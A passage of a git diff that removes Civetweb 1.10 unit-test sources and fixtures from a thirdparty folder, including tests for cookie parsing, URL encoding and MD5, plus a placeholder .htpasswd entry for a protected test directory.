- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in
- * all copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
- * THE SOFTWARE.
- */
-#ifndef TEST_PRIVATE_H_
-#define TEST_PRIVATE_H_
-
-#include "civetweb_check.h"
-
-Suite *make_private_suite(void);
-
-#endif /* TEST_PRIVATE_H_ */
diff --git a/thirdparty/civetweb-1.10/test/private_exe.c b/thirdparty/civetweb-1.10/test/private_exe.c
deleted file mode 100644
index 9131eff..0000000
--- a/thirdparty/civetweb-1.10/test/private_exe.c
+++ /dev/null
@@ -1,82 +0,0 @@
-/* Copyright (c) 2015-2017 the Civetweb developers
- *
- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in
- * all copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
- * THE SOFTWARE.
- */
-
-/**
- * We include the source file so that we have access to the internal private
- * static functions.
- */
-#ifdef _MSC_VER
-#ifndef _CRT_SECURE_NO_WARNINGS
-#define _CRT_SECURE_NO_WARNINGS
-#endif
-#endif
-
-#include "private_exe.h"
-
-/* This is required for "realpath". According to
- * http://man7.org/linux/man-pages/man3/realpath.3.html
- * defining _XOPEN_SOURCE 600 should be enough, but in
- * practice this does not work. */
-extern char *realpath(const char *path, char *resolved_path);
-
-/* main is already used in the test suite,
- * so this define will rename main in main.c */
-#define main exe_main
-
-#include "../src/main.c"
-
-#include <stdlib.h>
-
-/* This unit test file uses the excellent Check unit testing library.
- * The API documentation is available here:
- * http://check.sourceforge.net/doc/check_html/index.html
- */
-
-START_TEST(test_helper_funcs)
-{
-	const char *psrc = "test str";
-	char *pdst;
-
-	/* test sdup */
-	pdst = sdup(psrc);
-	ck_assert(pdst != NULL);
-	ck_assert_str_eq(pdst, psrc);
-	ck_assert_ptr_ne(pdst, psrc);
-	free(pdst);
-}
-END_TEST
-
-
-#if !defined(REPLACE_CHECK_FOR_LOCAL_DEBUGGING)
-Suite *
-make_private_exe_suite(void)
-{
-	Suite *const suite = suite_create("EXE");
-
-	TCase *const tcase_helper_funcs = tcase_create("Helper funcs");
-
-	tcase_add_test(tcase_helper_funcs, test_helper_funcs);
-	tcase_set_timeout(tcase_helper_funcs, civetweb_min_test_timeout);
-	suite_add_tcase(suite, tcase_helper_funcs);
-
-	return suite;
-}
-#endif
diff --git a/thirdparty/civetweb-1.10/test/private_exe.h b/thirdparty/civetweb-1.10/test/private_exe.h
deleted file mode 100644
index 5e8e9bf..0000000
--- a/thirdparty/civetweb-1.10/test/private_exe.h
+++ /dev/null
@@ -1,31 +0,0 @@
-/* Copyright (c) 2015-2017 the Civetweb developers
- *
- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in
- * all copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
- * THE SOFTWARE.
- */
-#ifndef TEST_PRIVATE_EXE_H_
-#define TEST_PRIVATE_EXE_H_
-
-#include "civetweb_check.h"
-
-Suite *make_private_exe_suite(void);
-
-/* This is a redefine for "main" in main.c */
-int exe_main(int argc, char *argv[]);
-
-#endif /* TEST_PRIVATE_H_ */
diff --git a/thirdparty/civetweb-1.10/test/protected/.htpasswd b/thirdparty/civetweb-1.10/test/protected/.htpasswd
deleted file mode 100644
index 5686ad3..0000000
--- a/thirdparty/civetweb-1.10/test/protected/.htpasswd
+++ /dev/null
@@ -1 +0,0 @@
-user:mydomain.com:1aeed57ec85c6126e335a54789c2ecfa
diff --git a/thirdparty/civetweb-1.10/test/protected/content.txt b/thirdparty/civetweb-1.10/test/protected/content.txt
deleted file mode 100644
index 0bcd51a..0000000
--- a/thirdparty/civetweb-1.10/test/protected/content.txt
+++ /dev/null
@@ -1,5 +0,0 @@
-Protected directory.
-
-username: user
-password: pass
-
diff --git a/thirdparty/civetweb-1.10/test/public_func.c b/thirdparty/civetweb-1.10/test/public_func.c
deleted file mode 100644
index deb3dd5..0000000
--- a/thirdparty/civetweb-1.10/test/public_func.c
+++ /dev/null
@@ -1,546 +0,0 @@
-/* Copyright (c) 2015-2017 the Civetweb developers

- *

- * Permission is hereby granted, free of charge, to any person obtaining a copy

- * of this software and associated documentation files (the "Software"), to deal

- * in the Software without restriction, including without limitation the rights

- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell

- * copies of the Software, and to permit persons to whom the Software is

- * furnished to do so, subject to the following conditions:

- *

- * The above copyright notice and this permission notice shall be included in

- * all copies or substantial portions of the Software.

- *

- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR

- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,

- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE

- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER

- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,

- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN

- * THE SOFTWARE.

- */

-

-#ifdef _MSC_VER

-#ifndef _CRT_SECURE_NO_WARNINGS

-#define _CRT_SECURE_NO_WARNINGS

-#endif

-#endif

-

-#include <stdlib.h>

-#include <stdio.h>

-

-#include "public_func.h"

-#include <civetweb.h>

-

-/* This unit test file uses the excellent Check unit testing library.

- * The API documentation is available here:

- * http://check.sourceforge.net/doc/check_html/index.html

- */

-

-START_TEST(test_mg_version)

-{

-	const char *ver = mg_version();

-	unsigned major = 0, minor = 0;

-	unsigned feature_files, feature_https, feature_cgi, feature_ipv6,

-	    feature_websocket, feature_lua, feature_duktape, feature_caching;

-	unsigned expect_files = 0, expect_https = 0, expect_cgi = 0,

-	         expect_ipv6 = 0, expect_websocket = 0, expect_lua = 0,

-	         expect_duktape = 0, expect_caching = 0;

-	int ret, len;

-	char *buf;

-

-	ck_assert(ver != NULL);

-	ck_assert_str_eq(ver, CIVETWEB_VERSION);

-

-	/* check structure of version string */

-	ret = sscanf(ver, "%u.%u", &major, &minor);

-	ck_assert_int_eq(ret, 2);

-	ck_assert_uint_ge(major, 1);

-	if (major == 1) {

-		ck_assert_uint_ge(minor, 8); /* current version is 1.8 */

-	}

-

-	/* check feature */

-	feature_files = mg_check_feature(1);

-	feature_https = mg_check_feature(2);

-	feature_cgi = mg_check_feature(4);

-	feature_ipv6 = mg_check_feature(8);

-	feature_websocket = mg_check_feature(16);

-	feature_lua = mg_check_feature(32);

-	feature_duktape = mg_check_feature(64);

-	feature_caching = mg_check_feature(128);

-

-#if !defined(NO_FILES)

-	expect_files = 1;

-#endif

-#if !defined(NO_SSL)

-	expect_https = 1;

-#endif

-#if !defined(NO_CGI)

-	expect_cgi = 1;

-#endif

-#if defined(USE_IPV6)

-	expect_ipv6 = 1;

-#endif

-#if defined(USE_WEBSOCKET)

-	expect_websocket = 1;

-#endif

-#if defined(USE_LUA)

-	expect_lua = 1;

-#endif

-#if defined(USE_DUKTAPE)

-	expect_duktape = 1;

-#endif

-#if !defined(NO_CACHING)

-	expect_caching = 1;

-#endif

-

-	ck_assert_uint_eq(expect_files, !!feature_files);

-	ck_assert_uint_eq(expect_https, !!feature_https);

-	ck_assert_uint_eq(expect_cgi, !!feature_cgi);

-	ck_assert_uint_eq(expect_ipv6, !!feature_ipv6);

-	ck_assert_uint_eq(expect_websocket, !!feature_websocket);

-	ck_assert_uint_eq(expect_lua, !!feature_lua);

-	ck_assert_uint_eq(expect_duktape, !!feature_duktape);

-	ck_assert_uint_eq(expect_caching, !!feature_caching);

-

-	/* get system information */

-	len = mg_get_system_info(NULL, 0);

-	ck_assert_int_gt(len, 0);

-	buf = (char *)malloc((unsigned)len + 1);

-	ck_assert_ptr_ne(buf, NULL);

-	ret = mg_get_system_info(buf, len + 1);

-	ck_assert_int_eq(len, ret);

-	ret = (int)strlen(buf);

-	ck_assert_int_eq(len, ret);

-	free(buf);

-}

-END_TEST

-

-

-START_TEST(test_mg_get_valid_options)

-{

-	int i;

-	const struct mg_option *default_options = mg_get_valid_options();

-

-	ck_assert(default_options != NULL);

-

-	for (i = 0; default_options[i].name != NULL; i++) {

-		ck_assert(default_options[i].name != NULL);

-		ck_assert(strlen(default_options[i].name) > 0);

-		ck_assert(((int)default_options[i].type) > 0);

-	}

-

-	ck_assert(i > 0);

-}

-END_TEST

-

-

-START_TEST(test_mg_get_builtin_mime_type)

-{

-	ck_assert_str_eq(mg_get_builtin_mime_type("x.txt"), "text/plain");

-	ck_assert_str_eq(mg_get_builtin_mime_type("x.html"), "text/html");

-	ck_assert_str_eq(mg_get_builtin_mime_type("x.HTML"), "text/html");

-	ck_assert_str_eq(mg_get_builtin_mime_type("x.hTmL"), "text/html");

-	ck_assert_str_eq(mg_get_builtin_mime_type("/abc/def/ghi.htm"), "text/html");

-	ck_assert_str_eq(mg_get_builtin_mime_type("x.unknown_extention_xyz"),

-	                 "text/plain");

-}

-END_TEST

-

-

-START_TEST(test_mg_strncasecmp)

-{

-	ck_assert(mg_strncasecmp("abc", "abc", 3) == 0);

-	ck_assert(mg_strncasecmp("abc", "abcd", 3) == 0);

-	ck_assert(mg_strncasecmp("abc", "abcd", 4) != 0);

-	ck_assert(mg_strncasecmp("a", "A", 1) == 0);

-

-	ck_assert(mg_strncasecmp("A", "B", 1) < 0);

-	ck_assert(mg_strncasecmp("A", "b", 1) < 0);

-	ck_assert(mg_strncasecmp("a", "B", 1) < 0);

-	ck_assert(mg_strncasecmp("a", "b", 1) < 0);

-	ck_assert(mg_strncasecmp("b", "A", 1) > 0);

-	ck_assert(mg_strncasecmp("B", "A", 1) > 0);

-	ck_assert(mg_strncasecmp("b", "a", 1) > 0);

-	ck_assert(mg_strncasecmp("B", "a", 1) > 0);

-

-	ck_assert(mg_strncasecmp("xAx", "xBx", 3) < 0);

-	ck_assert(mg_strncasecmp("xAx", "xbx", 3) < 0);

-	ck_assert(mg_strncasecmp("xax", "xBx", 3) < 0);

-	ck_assert(mg_strncasecmp("xax", "xbx", 3) < 0);

-	ck_assert(mg_strncasecmp("xbx", "xAx", 3) > 0);

-	ck_assert(mg_strncasecmp("xBx", "xAx", 3) > 0);

-	ck_assert(mg_strncasecmp("xbx", "xax", 3) > 0);

-	ck_assert(mg_strncasecmp("xBx", "xax", 3) > 0);

-}

-END_TEST

-

-

-START_TEST(test_mg_get_cookie)

-{

-	char buf[32];

-	int ret;

-	const char *longcookie = "key1=1; key2=2; key3; key4=4; key5=; key6; "

-	                         "key7=this+is+it; key8=8; key9";

-

-	/* invalid result buffer */

-	ret = mg_get_cookie("", "notfound", NULL, 999);

-	ck_assert_int_eq(ret, -2);

-

-	/* zero size result buffer */

-	ret = mg_get_cookie("", "notfound", buf, 0);

-	ck_assert_int_eq(ret, -2);

-

-	/* too small result buffer */

-	ret = mg_get_cookie("key=toooooooooolong", "key", buf, 4);

-	ck_assert_int_eq(ret, -3);

-

-	/* key not found in string */

-	ret = mg_get_cookie("", "notfound", buf, sizeof(buf));

-	ck_assert_int_eq(ret, -1);

-

-	ret = mg_get_cookie(longcookie, "notfound", buf, sizeof(buf));

-	ck_assert_int_eq(ret, -1);

-

-	/* key not found in string */

-	ret = mg_get_cookie("key1=1; key2=2; key3=3", "notfound", buf, sizeof(buf));

-	ck_assert_int_eq(ret, -1);

-

-	/* keys are found as first, middle and last key */

-	memset(buf, 77, sizeof(buf));

-	ret = mg_get_cookie("key1=1; key2=2; key3=3", "key1", buf, sizeof(buf));

-	ck_assert_int_eq(ret, 1);

-	ck_assert_str_eq("1", buf);

-

-	memset(buf, 77, sizeof(buf));

-	ret = mg_get_cookie("key1=1; key2=2; key3=3", "key2", buf, sizeof(buf));

-	ck_assert_int_eq(ret, 1);

-	ck_assert_str_eq("2", buf);

-

-	memset(buf, 77, sizeof(buf));

-	ret = mg_get_cookie("key1=1; key2=2; key3=3", "key3", buf, sizeof(buf));

-	ck_assert_int_eq(ret, 1);

-	ck_assert_str_eq("3", buf);

-

-	/* longer value in the middle of a longer string */

-	memset(buf, 77, sizeof(buf));

-	ret = mg_get_cookie(longcookie, "key7", buf, sizeof(buf));

-	ck_assert_int_eq(ret, 10);

-	ck_assert_str_eq("this+is+it", buf);

-

-	/* key with = but without value in the middle of a longer string */

-	memset(buf, 77, sizeof(buf));

-	ret = mg_get_cookie(longcookie, "key5", buf, sizeof(buf));

-	ck_assert_int_eq(ret, 0);

-	ck_assert_str_eq("", buf);

-

-	/* key without = and without value in the middle of a longer string */

-	memset(buf, 77, sizeof(buf));

-	ret = mg_get_cookie(longcookie, "key6", buf, sizeof(buf));

-	ck_assert_int_eq(ret, -1);

-	/* TODO: mg_get_cookie and mg_get_var(2) should have the same behavior */

-}

-END_TEST

-

-

-START_TEST(test_mg_get_var)

-{

-	char buf[32];

-	int ret;

-	const char *shortquery = "key1=1&key2=2&key3=3";

-	const char *longquery = "key1=1&key2=2&key3&key4=4&key5=&key6&"

-	                        "key7=this+is+it&key8=8&key9&&key10=&&"

-	                        "key7=that+is+it&key12=12";

-

-	/* invalid result buffer */

-	ret = mg_get_var2("", 0, "notfound", NULL, 999, 0);

-	ck_assert_int_eq(ret, -2);

-

-	/* zero size result buffer */

-	ret = mg_get_var2("", 0, "notfound", buf, 0, 0);

-	ck_assert_int_eq(ret, -2);

-

-	/* too small result buffer */

-	ret = mg_get_var2("key=toooooooooolong", 19, "key", buf, 4, 0);

-	/* ck_assert_int_eq(ret, -3);

-	   --> TODO: mg_get_cookie returns -3, mg_get_var -2. This should be

-	   unified. */

-	ck_assert(ret < 0);

-

-	/* key not found in string */

-	ret = mg_get_var2("", 0, "notfound", buf, sizeof(buf), 0);

-	ck_assert_int_eq(ret, -1);

-

-	ret = mg_get_var2(

-	    longquery, strlen(longquery), "notfound", buf, sizeof(buf), 0);

-	ck_assert_int_eq(ret, -1);

-

-	/* key not found in string */

-	ret = mg_get_var2(

-	    shortquery, strlen(shortquery), "notfound", buf, sizeof(buf), 0);

-	ck_assert_int_eq(ret, -1);

-

-	/* key not found in string */

-	ret = mg_get_var2("key1=1&key2=2&key3=3&notfound=here",

-	                  strlen(shortquery),

-	                  "notfound",

-	                  buf,

-	                  sizeof(buf),

-	                  0);

-	ck_assert_int_eq(ret, -1);

-

-	/* key not found in string */

-	ret = mg_get_var2(

-	    shortquery, strlen(shortquery), "key1", buf, sizeof(buf), 1);

-	ck_assert_int_eq(ret, -1);

-

-	/* keys are found as first, middle and last key */

-	memset(buf, 77, sizeof(buf));

-	ret = mg_get_var2(

-	    shortquery, strlen(shortquery), "key1", buf, sizeof(buf), 0);

-	ck_assert_int_eq(ret, 1);

-	ck_assert_str_eq("1", buf);

-

-	memset(buf, 77, sizeof(buf));

-	ret = mg_get_var2(

-	    shortquery, strlen(shortquery), "key2", buf, sizeof(buf), 0);

-	ck_assert_int_eq(ret, 1);

-	ck_assert_str_eq("2", buf);

-

-	memset(buf, 77, sizeof(buf));

-	ret = mg_get_var2(

-	    shortquery, strlen(shortquery), "key3", buf, sizeof(buf), 0);

-	ck_assert_int_eq(ret, 1);

-	ck_assert_str_eq("3", buf);

-

-	/* mg_get_var call mg_get_var2 with last argument 0 */

-	memset(buf, 77, sizeof(buf));

-	ret = mg_get_var(shortquery, strlen(shortquery), "key1", buf, sizeof(buf));

-	ck_assert_int_eq(ret, 1);

-	ck_assert_str_eq("1", buf);

-

-	/* longer value in the middle of a longer string */

-	memset(buf, 77, sizeof(buf));

-	ret =

-	    mg_get_var2(longquery, strlen(longquery), "key7", buf, sizeof(buf), 0);

-	ck_assert_int_eq(ret, 10);

-	ck_assert_str_eq("this is it", buf);

-

-	/* longer value in the middle of a longer string - seccond occurance of key

-	 */

-	memset(buf, 77, sizeof(buf));

-	ret =

-	    mg_get_var2(longquery, strlen(longquery), "key7", buf, sizeof(buf), 1);

-	ck_assert_int_eq(ret, 10);

-	ck_assert_str_eq("that is it", buf);

-

-	/* key with = but without value in the middle of a longer string */

-	memset(buf, 77, sizeof(buf));

-	ret =

-	    mg_get_var2(longquery, strlen(longquery), "key5", buf, sizeof(buf), 0);

-	ck_assert_int_eq(ret, 0);

-	ck_assert_str_eq(buf, "");

-

-	/* key without = and without value in the middle of a longer string */

-	memset(buf, 77, sizeof(buf));

-	ret =

-	    mg_get_var2(longquery, strlen(longquery), "key6", buf, sizeof(buf), 0);

-	ck_assert_int_eq(ret, -1);

-	ck_assert_str_eq(buf, "");

-	/* TODO: this is the same situation as with mg_get_value */

-}

-END_TEST

-

-

-START_TEST(test_mg_md5)

-{

-	char buf[33];

-	char *ret;

-	const char *long_str =

-	    "_123456789A123456789B123456789C123456789D123456789E123456789F123456789"

-	    "G123456789H123456789I123456789J123456789K123456789L123456789M123456789"

-	    "N123456789O123456789P123456789Q123456789R123456789S123456789T123456789"

-	    "U123456789V123456789W123456789X123456789Y123456789Z";

-

-	memset(buf, 77, sizeof(buf));

-	ret = mg_md5(buf, NULL);

-	ck_assert_str_eq(buf, "d41d8cd98f00b204e9800998ecf8427e");

-	ck_assert_str_eq(ret, "d41d8cd98f00b204e9800998ecf8427e");

-	ck_assert_ptr_eq(ret, buf);

-

-	memset(buf, 77, sizeof(buf));

-	ret = mg_md5(buf, "The quick brown fox jumps over the lazy dog.", NULL);

-	ck_assert_str_eq(buf, "e4d909c290d0fb1ca068ffaddf22cbd0");

-	ck_assert_str_eq(ret, "e4d909c290d0fb1ca068ffaddf22cbd0");

-	ck_assert_ptr_eq(ret, buf);

-

-	memset(buf, 77, sizeof(buf));

-	ret = mg_md5(buf,

-	             "",

-	             "The qu",

-	             "ick bro",

-	             "",

-	             "wn fox ju",

-	             "m",

-	             "ps over the la",

-	             "",

-	             "",

-	             "zy dog.",

-	             "",

-	             NULL);

-	ck_assert_str_eq(buf, "e4d909c290d0fb1ca068ffaddf22cbd0");

-	ck_assert_str_eq(ret, "e4d909c290d0fb1ca068ffaddf22cbd0");

-	ck_assert_ptr_eq(ret, buf);

-

-	memset(buf, 77, sizeof(buf));

-	ret = mg_md5(buf, long_str, NULL);

-	ck_assert_str_eq(buf, "1cb13cf9f16427807f081b2138241f08");

-	ck_assert_str_eq(ret, "1cb13cf9f16427807f081b2138241f08");

-	ck_assert_ptr_eq(ret, buf);

-

-	memset(buf, 77, sizeof(buf));

-	ret = mg_md5(buf, long_str + 1, NULL);

-	ck_assert_str_eq(buf, "cf62d3264334154f5779d3694cc5093f");

-	ck_assert_str_eq(ret, "cf62d3264334154f5779d3694cc5093f");

-	ck_assert_ptr_eq(ret, buf);

-}

-END_TEST

-

-

-START_TEST(test_mg_url_encode)

-{

-	char buf[20];

-	int ret;

-

-	memset(buf, 77, sizeof(buf));

-	ret = mg_url_encode("abc", buf, sizeof(buf));

-	ck_assert_int_eq(3, ret);

-	ck_assert_str_eq("abc", buf);

-

-	memset(buf, 77, sizeof(buf));

-	ret = mg_url_encode("a%b/c&d.e", buf, sizeof(buf));

-	ck_assert_int_eq(15, ret);

-	ck_assert_str_eq("a%25b%2fc%26d.e", buf);

-

-	memset(buf, 77, sizeof(buf));

-	ret = mg_url_encode("%%%", buf, 4);

-	ck_assert_int_eq(-1, ret);

-	ck_assert_str_eq("%25", buf);

-}

-END_TEST

-

-

-START_TEST(test_mg_url_decode)

-{

-	char buf[20];

-	int ret;

-

-	ret = mg_url_decode("abc", 3, buf, sizeof(buf), 0);

-	ck_assert_int_eq(ret, 3);

-	ck_assert_str_eq(buf, "abc");

-

-	ret = mg_url_decode("abcdef", 3, buf, sizeof(buf), 0);

-	ck_assert_int_eq(ret, 3);

-	ck_assert_str_eq(buf, "abc");

-

-	ret = mg_url_decode("x+y", 3, buf, sizeof(buf), 0);

-	ck_assert_int_eq(ret, 3);

-	ck_assert_str_eq(buf, "x+y");

-

-	ret = mg_url_decode("x+y", 3, buf, sizeof(buf), 1);

-	ck_assert_int_eq(ret, 3);

-	ck_assert_str_eq(buf, "x y");

-

-	ret = mg_url_decode("%25", 3, buf, sizeof(buf), 1);

-	ck_assert_int_eq(ret, 1);

-	ck_assert_str_eq(buf, "%");

-}

-END_TEST

-

-

-START_TEST(test_mg_get_response_code_text)

-{

-	int i;

-	size_t j, len;

-	const char *resp;

-

-	for (i = 100; i < 600; i++) {

-		resp = mg_get_response_code_text(NULL, i);

-		ck_assert_ptr_ne(resp, NULL);

-		len = strlen(resp);

-		ck_assert_uint_gt(len, 1);

-		ck_assert_uint_lt(len, 32);

-		for (j = 0; j < len; j++) {

-			if (resp[j] == ' ') {

-				/* space is valid */

-			} else if (resp[j] == '-') {

-				/* hyphen is valid */

-			} else if (resp[j] >= 'A' && resp[j] <= 'Z') {

-				/* A-Z is valid */

-			} else if (resp[j] >= 'a' && resp[j] <= 'z') {

-				/* a-z is valid */

-			} else {

-				ck_abort_msg("Found letter %c (%02xh) in %s",

-				             resp[j],

-				             resp[j],

-				             resp);

-			}

-		}

-	}

-}

-END_TEST

-

-

-#if !defined(REPLACE_CHECK_FOR_LOCAL_DEBUGGING)

-Suite *

-make_public_func_suite(void)

-{

-	Suite *const suite = suite_create("PublicFunc");

-

-	TCase *const tcase_version = tcase_create("Version");

-	TCase *const tcase_get_valid_options = tcase_create("Options");

-	TCase *const tcase_get_builtin_mime_type = tcase_create("MIME types");

-	TCase *const tcase_strncasecmp = tcase_create("strcasecmp");

-	TCase *const tcase_urlencodingdecoding =

-	    tcase_create("URL encoding decoding");

-	TCase *const tcase_cookies = tcase_create("Cookies and variables");

-	TCase *const tcase_md5 = tcase_create("MD5");

-	TCase *const tcase_aux = tcase_create("Aux functions");

-

-	tcase_add_test(tcase_version, test_mg_version);

-	tcase_set_timeout(tcase_version, civetweb_min_test_timeout);

-	suite_add_tcase(suite, tcase_version);

-

-	tcase_add_test(tcase_get_valid_options, test_mg_get_valid_options);

-	tcase_set_timeout(tcase_get_valid_options, civetweb_min_test_timeout);

-	suite_add_tcase(suite, tcase_get_valid_options);

-

-	tcase_add_test(tcase_get_builtin_mime_type, test_mg_get_builtin_mime_type);

-	tcase_set_timeout(tcase_get_builtin_mime_type, civetweb_min_test_timeout);

-	suite_add_tcase(suite, tcase_get_builtin_mime_type);

-

-	tcase_add_test(tcase_strncasecmp, test_mg_strncasecmp);

-	tcase_set_timeout(tcase_strncasecmp, civetweb_min_test_timeout);

-	suite_add_tcase(suite, tcase_strncasecmp);

-

-	tcase_add_test(tcase_urlencodingdecoding, test_mg_url_encode);

-	tcase_add_test(tcase_urlencodingdecoding, test_mg_url_decode);

-	tcase_set_timeout(tcase_urlencodingdecoding, civetweb_min_test_timeout);

-	suite_add_tcase(suite, tcase_urlencodingdecoding);

-

-	tcase_add_test(tcase_cookies, test_mg_get_cookie);

-	tcase_add_test(tcase_cookies, test_mg_get_var);

-	tcase_set_timeout(tcase_cookies, civetweb_min_test_timeout);

-	suite_add_tcase(suite, tcase_cookies);

-

-	tcase_add_test(tcase_md5, test_mg_md5);

-	tcase_set_timeout(tcase_md5, civetweb_min_test_timeout);

-	suite_add_tcase(suite, tcase_md5);

-

-	tcase_add_test(tcase_aux, test_mg_get_response_code_text);

-	tcase_set_timeout(tcase_aux, civetweb_min_test_timeout);

-	suite_add_tcase(suite, tcase_aux);

-

-	return suite;

-}

-#endif

diff --git a/thirdparty/civetweb-1.10/test/public_func.h b/thirdparty/civetweb-1.10/test/public_func.h
deleted file mode 100644
index e214083..0000000
--- a/thirdparty/civetweb-1.10/test/public_func.h
+++ /dev/null
@@ -1,28 +0,0 @@
-/* Copyright (c) 2015-2017 the Civetweb developers
- *
- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in
- * all copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
- * THE SOFTWARE.
- */
-#ifndef TEST_PUBLIC_FUNC_H_
-#define TEST_PUBLIC_FUNC_H_
-
-#include "civetweb_check.h"
-
-Suite *make_public_func_suite(void);
-
-#endif /* TEST_PUBLIC_H_ */
diff --git a/thirdparty/civetweb-1.10/test/public_server.c b/thirdparty/civetweb-1.10/test/public_server.c
deleted file mode 100644
index b080ac2..0000000
--- a/thirdparty/civetweb-1.10/test/public_server.c
+++ /dev/null
@@ -1,4953 +0,0 @@
-/* Copyright (c) 2015-2017 the Civetweb developers
- *
- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in
- * all copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
- * THE SOFTWARE.
- */
-
-#ifdef _MSC_VER
-#ifndef _CRT_SECURE_NO_WARNINGS
-#define _CRT_SECURE_NO_WARNINGS
-#endif
-#endif
-
-#include <stdlib.h>
-#include <stdio.h>
-#include <stdarg.h>
-#include <string.h>
-#include <stdint.h>
-#include <time.h>
-#include <sys/types.h>
-#include <sys/stat.h>
-
-#include "public_server.h"
-#include <civetweb.h>
-
-#if defined(_WIN32)
-#include <windows.h>
-#define test_sleep(x) (Sleep((x)*1000))
-#else
-#include <unistd.h>
-#define test_sleep(x) (sleep(x))
-#endif
-
-#define SLEEP_BEFORE_MG_START (1)
-#define SLEEP_AFTER_MG_START (3)
-#define SLEEP_BEFORE_MG_STOP (1)
-#define SLEEP_AFTER_MG_STOP (5)
-
-/* This unit test file uses the excellent Check unit testing library.
- * The API documentation is available here:
- * http://check.sourceforge.net/doc/check_html/index.html
- */
-
-#if defined(__MINGW32__) || defined(__GNUC__)
-/* Return codes of the tested functions are evaluated. Checking all other
- * functions, used only to prepare the test environment seems redundant.
- * If they fail, the test fails anyway. */
-#pragma GCC diagnostic ignored "-Wunused-result"
-#endif
-
-static const char *
-locate_path(const char *a_path)
-{
-	static char r_path[256];
-
-#ifdef _WIN32
